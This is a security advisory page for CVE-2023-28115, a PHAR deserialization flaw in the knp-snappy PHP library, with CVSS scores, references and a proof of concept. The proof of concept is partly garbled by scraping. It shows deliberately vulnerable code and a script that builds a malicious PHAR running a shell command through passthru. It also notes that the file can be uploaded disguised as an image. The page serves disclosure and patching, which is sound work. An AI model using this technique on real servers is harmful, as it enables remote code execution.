Lucene search

K
friendsofphpOpenJS FoundationFRIENDSOFPHP:KNPLABS:KNP-SNAPPY:CVE-2023-28115
HistoryMar 17, 2023 - 3:47 p.m.

PHAR deserialization allowing remote code execution

2023-03-1715:47:00
OpenJS Foundation
github.com
3
phar deserialization
snappy
remote code execution
protocol checking
file upload
php objects
laravel
symfony
proof of concept
composer
vulnerability
php
remote exploit
file upload vulnerability
security advisory
exploit
nvd
github
code execution

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

Low

0.021 Low

EPSS

Percentile

89.1%

Description Description snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization. Proof of Concept Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code. callback, $this->fileName); } } $snappy = new Pdf(‘/usr/local/bin/wkhtmltopdf’); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml(’

Bill

You owe me money, dude.

', ‘phar://poc.phar’); As an attacker, we going to generate the malicious phar using this script. callback = “passthru”; $dummy->fileName = “uname -a > pwned”; //our payload // Delete any existing PHAR archive with that name @unlink(“poc.phar”); // Create a new archive $poc = new Phar(“poc.phar”); // Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering(); // Set the stub $poc->setStub("setMetadata($dummy); // Stop buffering and write changes to disk $poc->stopBuffering(); ?> Then run these command to generate the file php --define phar.readonly=0 generate_phar.php Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick. Impact This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. Occurences https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670 References https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/ References GHSA-gq6w-q6wh-jggc KnpLabs/snappy@1ee6360 https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/ https://nvd.nist.gov/vuln/detail/CVE-2023-28115 KnpLabs/snappy#469 KnpLabs/snappy@b66f793 https://github.com/KnpLabs/snappy/blob/5126fb5b335ec929a226314d40cd8dad497c3d67/src/Knp/Snappy/AbstractGenerator.php#L670 https://github.com/KnpLabs/snappy/releases/tag/v1.4.2 https://github.com/FriendsOfPHP/security-advisories/blob/master/knplabs/knp-snappy/CVE-2023-28115.yaml GHSA-gq6w-q6wh-jggc

Affected configurations

Vulners
Node
knplabssnappyRange<1.4.2
CPENameOperatorVersion
knplabs/knp-snappylt1.4.2

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.4 High

AI Score

Confidence

Low

0.021 Low

EPSS

Percentile

89.1%

Related for FRIENDSOFPHP:KNPLABS:KNP-SNAPPY:CVE-2023-28115